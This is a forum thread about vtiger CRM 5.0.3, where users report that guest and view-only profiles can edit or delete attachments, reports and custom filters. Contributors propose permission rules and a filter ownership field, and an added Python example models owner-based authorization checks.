Serious security feature: attachments, reports, filters

Attachments
Anyone, even the guest profile, even without insert/delete permission on modules, can insert and delete attachments, even those inserted by other users.

Reports
Anyone, even the guest profile, even without insert/delete/edit permission on modules, can insert, delete and edit reports, even those inserted by other users.

Filters
Anyone, even the guest profile, even without insert/delete/edit permission on modules, can insert, delete and edit filters, even those inserted by other users.

I hope someone will tell me that there's already an easy way to avoid these problems without doing a feature request :wink:
Thank you

Comments

  • did you upgrade to v5.0.3?
  • sorry, i have to upgrade my signature :)
    yes, we're running the 5.0.3 version.
    but i've also tested all on en.vtiger.com and it 'works' the same way.
  • i'm having a similar issue: the profiles appear with everything checked, the only way to stop it is to erase the module altogether... it started when updating from 5.0.1 to 5.0.3
  • dear vinontiger,
    attachments
    anyone, even the guest profile, even without insert/delete permission on modules, can insert and delete attachments, even those inserted by other users.

    as we can't set permissions for attachments, all crm users have permission to add file attachments. however, we can disable the delete permission for file attachments if the user has only the view permission for the particular record.
    reports
    anyone, even the guest profile, even without insert/delete/edit permission on modules, can insert, delete and edit reports, even those inserted by other users.

    if the user does not have permission for a particular module, he can't create/edit/view/delete reports for that module. for example, if the potentials module is not permitted for the user smith, smith cannot create/edit/view/delete potentials-related reports. but the following functionalities need to be implemented:
      1) if only view permission is given for a particular module, say potentials, create/edit/delete permission for potentials reports should be disabled.
      2) if create/edit and view permission are given, delete permission should be disabled.
      3) if delete and view permission are given, create permission should be disabled.
    filters
    anyone, even the guest profile, even without insert/delete/edit permission on modules, can insert, delete and edit filters, even those inserted by other users.

    as the customview filter is not specific to any module/user, it can be edited/deleted by any crm user. however, we can provide a "do not edit/delete" option. if a user creates a customview filter and enables this option, the filter cannot be deleted/edited by other users.

    this is my opinion. kindly give yours.

    thanks & regards,
    minnie.
  • dear vinontiger,
    attachments
    anyone, even the guest profile, even without insert/delete permission on modules, can insert and delete attachments, even those inserted by other users.

    as we can't set permissions for attachments, all crm users have permission to add file attachments. however, we can disable the delete permission for file attachments if the user has only the view permission for the particular record.

    if anyone can add an attachment, that is a minor problem.
    the problem is that now vtiger doesn't work as you said. if a user has only the view permission on a specific module, he can still delete any attachment in that module. please try it.

    reports
    anyone, even the guest profile, even without insert/delete/edit permission on modules, can insert, delete and edit reports, even those inserted by other users.
    if the user does not have permission for a particular module, he can't create/edit/view/delete reports for that module. for example, if the potentials module is not permitted for the user smith, smith cannot create/edit/view/delete potentials-related reports. but the following functionalities need to be implemented:
      1) if only view permission is given for a particular module, say potentials, create/edit/delete permission for potentials reports should be disabled.
      2) if create/edit and view permission are given, delete permission should be disabled.
      3) if delete and view permission are given, create permission should be disabled.

    i agree with you on these rules :)
    but there is a problem now: if a user has only the view permission on a module, he can edit the report. please try it.
    filters
    anyone, even the guest profile, even without insert/delete/edit permission on modules, can insert, delete and edit filters, even those inserted by other users.
    as the customview filter is not specific to any module/user, it can be edited/deleted by any crm user. however, we can provide a "do not edit/delete" option. if a user creates a customview filter and enables this option, the filter cannot be deleted/edited by other users.

    this is my opinion. kindly give yours.

    thanks & regards,
    minnie.

    *now* any user, regardless of which kind of permission he has, can edit/delete or add any filter, even the default ones that come with the installation.

    i believe that only the administrator or a specific profile should be able to add/edit/delete filters.
    when a user creates a filter it is visible to everyone.
    let's imagine the confusion if users really start to do so: suddenly the filter combo will contain a lot of filters.
    it would be advisable to add options like these:
    1) add/edit/delete filters is bound to a specific profile
    2) the filter should have a public/private option or, better, be related to groups/roles, so every user/group sees only the filters of its own interest in the filter combo.
    3) it should be possible to define the order in which filters are displayed, because now they appear in the filter combo in the order in which they were added.
    thank you
  • was there ever any resolution to the filter issue? i think filters have to have a public/private option.

    we have 65 potential users, it's going to be a mess showing all filters all the time.
  • it also appears that 'my sites' are shared between all users. again this is going to be a mess.
  • i can confirm that this feature request is very good.

    there is ticket:

    http://trac.vtiger.com/cgi-bin/trac.cgi/ticket/4083

    regards,

    ln
  • i'm looking at the tables now, i don't see anything tying the creator to the filter, it appears a new filter_owner field is going to be needed to initially keep custom fields private to their creator/owner.

    i'd like to at least keep the filters private for the moment, expand into the permissions system later.
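The authorization model discussed across this thread (Minnie's derived report permissions, and the filter_owner column plus public/private flag proposed in the comment above), written out as an added example. This is illustrative code for this page, not vtiger's code: the `User`, `Filter`, `module_perms` and `is_public` names, the per-module view/create/edit/delete bits and the admin bypass are all assumptions, and the sample users and filters are constructed.

```python
# Added example (not vtiger code): an object-level authorization model for
# reports, filters and attachments that follows the rules proposed in this
# thread. Assumptions: a profile grants per-module bits (view/create/edit/
# delete), filters carry an owner column (the suggested "filter_owner" field)
# plus a public/private flag, and an admin profile bypasses the checks.
from dataclasses import dataclass, field

VIEW, CREATE, EDIT, DELETE = "view", "create", "edit", "delete"


@dataclass
class User:
    name: str
    is_admin: bool = False
    # module name -> permission bits granted by the user's profile (assumed shape)
    module_perms: dict = field(default_factory=dict)

    def module_allows(self, module, action):
        return self.is_admin or action in self.module_perms.get(module, ())


def report_permissions(user, module):
    """Report actions derived from the module permissions (Minnie's rules,
    generalised): no view on the module means no report access at all, and
    create/edit/delete on reports each require the matching module bit."""
    if user.is_admin:
        return {VIEW, CREATE, EDIT, DELETE}
    perms = set(user.module_perms.get(module, ()))
    if VIEW not in perms:
        return set()
    return {VIEW} | (perms & {CREATE, EDIT, DELETE})


@dataclass
class Filter:
    name: str
    module: str
    owner: str          # the assumed filter_owner column
    is_public: bool = False


def can_view_filter(user, flt):
    """Module view is always required; beyond that a filter is visible to its
    owner, to admins, or to anyone if it was made public."""
    if not user.module_allows(flt.module, VIEW):
        return False
    return user.is_admin or flt.is_public or flt.owner == user.name


def can_modify_filter(user, flt, action):
    """Edit/delete is owner-or-admin only, so the guest profile can no longer
    delete another user's filter; the public flag grants view, not edit."""
    if action not in (EDIT, DELETE) or not can_view_filter(user, flt):
        return False
    return user.is_admin or flt.owner == user.name


def can_delete_attachment(user, module):
    """Same principle for attachments: delete needs delete on the record's
    module, so a view-only user can look but not remove."""
    return user.module_allows(module, DELETE)


# Constructed sample data for the checks below.
GUEST = User("guest")
SMITH = User("smith", module_perms={"Potentials": {VIEW}})
JONES = User("jones", module_perms={"Potentials": {VIEW, CREATE, EDIT}})
ADMIN = User("admin", is_admin=True)
PRIVATE_FILTER = Filter("hot deals", "Potentials", owner="jones")
PUBLIC_FILTER = Filter("all open", "Potentials", owner="jones", is_public=True)


def demo():
    """Return the outcomes as a dict so they can be inspected or tested."""
    return {
        "guest_reports": report_permissions(GUEST, "Potentials"),
        "smith_reports": report_permissions(SMITH, "Potentials"),
        "jones_reports": report_permissions(JONES, "Potentials"),
        "guest_deletes_private": can_modify_filter(GUEST, PRIVATE_FILTER, DELETE),
        "smith_sees_private": can_view_filter(SMITH, PRIVATE_FILTER),
        "smith_sees_public": can_view_filter(SMITH, PUBLIC_FILTER),
        "smith_edits_public": can_modify_filter(SMITH, PUBLIC_FILTER, EDIT),
        "jones_edits_private": can_modify_filter(JONES, PRIVATE_FILTER, EDIT),
        "smith_deletes_attachment": can_delete_attachment(SMITH, "Potentials"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The point of the model is that every check is made against the object being touched (the record's module, the filter's owner), not just against whether the user may use the list view at all; that is the gap the thread describes, where a guest can delete other users' filters and attachments.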
  • are your users using mainly one filter or more than one?

    because if only/mainly one, it would be better to think about how to set up different filters for different users/groups as the default in a first step....

    regards,

    ln